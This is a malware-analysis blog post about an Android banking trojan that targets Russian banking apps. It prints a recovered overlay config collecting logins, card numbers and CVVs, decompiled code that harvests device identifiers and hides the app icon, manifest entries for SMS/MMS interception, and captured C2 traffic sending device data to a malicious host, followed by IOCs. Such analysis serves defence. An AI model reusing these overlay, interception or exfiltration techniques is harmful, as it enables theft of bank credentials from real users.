Monday, 25 September 2017

Mobile Threats targeting Russian Banks

Targets (banks): 
ru.sberbankmobile (Sberbank of Russia / Сбербанк Онлайн), ru.alfabank.mobile.android (Alfa Bank / Альфа-Банк), ru.vtb24.mobilebanking.android (VTB24 / ВТБ24-Онлайн)


Target Language & Locales (based on Values):
Russian, English and Polish 

SHA-256 (Koodous / VT): 
D118B6A3A86F6BCB303756F3154BFEBDCEBA30C82E8443254F61F29E2FEC5715


preferences.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?><map>
    <!-- SharedPreferences file recovered from the sample; several values are masked with x's by the author. Key meanings below are inferred from the key names and from the captured traffic further down the page; confirm against the decompiled payload. -->
    <string name="number">1555xxxxx0</string><!-- presumably the device's own phone number (cf. number= in the POST body) -->
    <string name="App Restrictions">AAAAAA==
    </string><!-- base64 of four zero bytes; purpose not evident from this dump -->
    <string name="timetask">17/10/17 10:24:31</string><!-- locale-formatted timestamp, presumably a scheduled task time; note it lies after the capture date -->
    <string name="sentsms">11506,</string><!-- trailing comma suggests a comma-separated list; contents not explained on this page -->
    <string name="injects">ru.sberbankmobile;ru.alfabank.mobile.android;ru.vtb24.mobilebanking.android;ru.sberbankmobile</string><!-- semicolon-separated package names of the overlaid banking apps; matches the targets listed at the top (ru.sberbankmobile appears twice) -->
    <string name="str">xxxxxxxxxx</string><!-- masked; meaning unknown -->
    <string name="operator">MTS</string><!-- mobile operator name, matches operator= in the POST body -->
    <string name="country">ru</string><!-- SIM country ISO code, matches country= in the POST body -->
    <string name="botpwd">xxxxxxxxxxx</string><!-- masked; presumably the pwd= value sent to the C2 -->
    <string name="imei">xxxxxxxx</string><!-- masked device IMEI, sent as imei= to the C2 -->
    <string name="mode">xxxxxxxxxxxxxx</string><!-- masked; possibly the "mode" token returned in the C2 JSON response, verify -->
    <string name="intercept">900;Beeline;111;7878;+900;Beeline;111;7878;+79254247494;7494;QIWIWallet;beeline;6996;8464;117007227;My Beeline;MTC;iMTCPay;8900;117007228;AntivirusMF;mts-FMS</string><!-- semicolon-separated SMS short codes and sender names (operator and payment-service names are recognizable); presumably senders whose messages are intercepted or hidden from the user, confirm in the SMS receiver code -->
    <int name="haveinj" value="0" /><!-- 0/1 flag; presumably whether an inject has been fetched -->
    <int name="autonet" value="1" /><!-- 0/1 flag; meaning not evident from this dump -->
</map>

settings.xml (from assets)
<?xml version="1.0" encoding="UTF-8"?><!-- The file must be UTF-8 encoded (without BOM) -->
<!-- Overlay ("inject") definition shipped in the APK's assets. The original comments were in Russian; they are translated here. Each <step> describes one phishing form; <name> values mirror the form field names, so the three steps collect credentials, card number with expiry, and CVV. -->
<document>
 <name>Сбербанк</name><!-- Inject name -->
 <apps>ru.sberbankmobile;com.mobilecard.sberbank</apps><!-- Applications to be overlaid (semicolon-separated) -->
 <size>1</size><!-- Inject size (1 = standard, 2 = as a dialog) -->
 <storage>2</storage><!-- Inject storage location (1 = on the device, 2 = on the server) -->
 
 <step><!-- New step (form) -->
  <param><!-- Parameter within a step (form) -->
   <column>Пароль2</column><!-- Column title (for the "Injects" then "Data" tab of the panel) -->
   <name>password</name><!-- Parameter name (the name field of the form in index.html) -->
  </param>

  <param>
   <column>Логин2</column>
   <name>login</name>
  </param>

  <param>
   <column>Пароль</column>
   <name>password</name>
  </param>

  <param>
   <column>Логин</column>
   <name>login</name>
  </param>
 </step>

 <step>
  <param>
   <column>ГГ2</column>
   <name>expiry_year</name>
  </param>

  <param>
   <column>ММ2</column>
   <name>expiry_month</name>
  </param>

  <param>
   <column>Карта2</column>
   <name>card_number</name>
  </param>

  <param>
   <column>ГГ</column>
   <name>expiry_year</name>
  </param>

  <param>
   <column>Карта</column>
   <name>card_number</name>
  </param>

  <param>
   <column>ММ</column>
   <name>expiry_month</name>
  </param>
 </step>

 <step>
  <param>
   <column>Cvv</column>
   <name>cvv</name>
  </param>

  <param>
   <column>Cvv2</column>
   <name>cvv</name>
  </param>
 </step>

</document>

The decrypted payload retrieves device information such as the network operator name, phone number, device ID and SIM country ISO code, and additionally hides the application icon. The code below is taken from the decrypted payload.

v6.putString(nzkic.Q(v0_1, v1, v1 & 21), ((TelephonyManager)v4).getNetworkOperatorName());
        v6.putString(nzkic.Q(nzkic.W[7], nzkic.W[7] - 3, nzkic.W[7]), ((TelephonyManager)v4).getLine1Number());
        v6.putString(nzkic.Q(nzkic.W[4] + 1, 21, nzkic.W[19]), ((TelephonyManager)v4).getDeviceId());
        v6.putString(nzkic.Q(nzkic.E, -nzkic.W[15], nzkic.W[26]), ((TelephonyManager)v4).getSimCountryIso()
                .toString());
        v6.apply();
        try {
            if(!e.Q(ewpgkdp.class, nzkic.Q)) {
                Intent v7 = new Intent(nzkic.Q, ewpgkdp.class);
                v7.setFlags(268435456);
                nzkic.Q.startService(v7);
            }

            goto label_69;
        }
        catch(Exception ) {
        label_69:
            this.setContentView(2130903040);
            this.findViewById(2131296263).setOnClickListener(new ap(this));
            try {
                nzkic.Q.getPackageManager().setComponentEnabledSetting(new ComponentName(nzkic.Q, nzkic
                        .class), 2, 1);
                return;
            }
            catch(Exception ) {
                return;
            }
        }

Manifest entries that register the trojan to receive incoming MMS (WAP push) notifications and to handle SMS/MMS send intents.

  <!-- Manifest excerpt; the enclosing <application> element is not shown. The SEND/SENDTO activity and the WAP_PUSH_DELIVER receiver below are two of the components Android 4.4+ requires of an app before it can be selected as the default SMS handler; the SMS_DELIVER receiver and RESPOND_VIA_MESSAGE service that complete that set are not in this excerpt. -->
  <activity android:name="com.vuzbswbpv.ipapszyud.pmeoacpq" android:theme="@android:style/Theme.Translucent.NoTitleBar"><!-- translucent theme without a title bar, so the activity can be launched without a visible window -->
            <intent-filter><!-- registers the activity as a handler for composing SMS/MMS messages -->
                <action android:name="android.intent.action.SEND" />
                <action android:name="android.intent.action.SENDTO" />
                <category android:name="android.intent.category.DEFAULT" />
                <category android:name="android.intent.category.BROWSABLE" /><!-- BROWSABLE: also reachable from links in a browser -->
                <data android:scheme="sms" />
                <data android:scheme="smsto" />
                <data android:scheme="mms" />
                <data android:scheme="mmsto" />
            </intent-filter>
        </activity>
        <activity android:label="watkzhcehx" android:name="com.vxnpedkz.fxdjrjoap.miakcfgde" /><!-- random-looking label and class name; no intent filter in this excerpt -->
        <receiver android:enabled="@bool/KitKat" android:name="com.vuzbswbpv.ipapszyud.skuogio" android:permission="android.permission.BROADCAST_WAP_PUSH"><!-- enabled through a boolean resource, presumably gated on API level 19+; the permission limits senders of this broadcast to the system -->
            <intent-filter><!-- delivers incoming MMS notifications (WAP push) to the receiver -->
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />
                <data android:mimeType="application/vnd.wap.mms-message" />
            </intent-filter>
        </receiver>

Uses a window of type TYPE_SYSTEM_ERROR (2010) to draw its dialog on top of any other activity.

   WindowManager$LayoutParams v5 = new WindowManager$LayoutParams();
        v5.flags = 7078272;
        v5.format = -3;
        this.W = this.findViewById(2131296264);
        ViewParent v6 = this.W.getParent();
        if(v6 != null) {
            ((ViewGroup)v6).removeView(this.W);
        }

        v5.format = 1;
        v5.type = 2010;
        v5.gravity = 51;
        int v0 = v6 != null ? -1 : this.W.getLayoutParams().width;
        v5.width = v0;
        v0 = v6 != null ? -1 : this.W.getLayoutParams().height;
        v5.height = v0;
        this.getApplicationContext().getSystemService(qoquqms.Q(-qoquqms.F[9], qoquqms.F[0], qoquqms
                .F[0] | 109).intern()).addView(this.W, ((ViewGroup$LayoutParams)v5));
        this.W.findViewById(2131296272).setOnClickListener(new j(this, this.W.findViewById(2131296265), 
                this.W.findViewById(2131296273)));

Traffic:

REQUEST xx.x.x.xx:xxxxx -> wef34r34rs.xyz:80 at 1506759408511
================================================================================
POST /req.php HTTP/1.1
Host: wef34r34rs.xyz
Connection: Keep-Alive
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
User-Agent: yasuo23

mode=showInj
name=

RESPONSE wef34r34rs.xyz:80 -> xx.x.x.xx:xxxxx 
================================================================================
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 110
Content-Type: application/json; charset=utf-8
Date: Mon, 25 Sep 2017 08:16:50 GMT
Server: nginx/1.10.2
X-Powered-By: PHP/5.4.16

{"info": [{"key": 493xxxx27, "mode": "dRTfO8nxGlQokDcccccccccccccc6f2"}], "response": [], "status": "ok"}

REQUEST xx.x.x.xx:xxxxx -> wef34r34rs.xyz:80
================================================================================
POST /req.php HTTP/1.1
Host: wef34r34rs.xyz
Connection: Keep-Alive
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
User-Agent: yasuo23

imei=490xxxxxxx8
inj=
mode=voice
number=1xxxxxxxx0
operator=MTS
rights=0
sdk=23
country=ru
hooksms=
prefix=635
version_bot=23
pwd=3c1fxxxxxxxxxxxxxxxxxxxxx1ed14
hookcalls=
version_sdk=Nexus 4 v.6.0.1

IOCs

URLs (IP address and hostname)
154.16.244.28 23r23e23er.xyz
154.16.244.28 fwefr434r3.xyz
154.16.244.140 ge5t5t54trtr.xyz
154.16.244.28 rgrer43e2e.xyz
154.16.244.28 wef34r34rs.xyz

Images
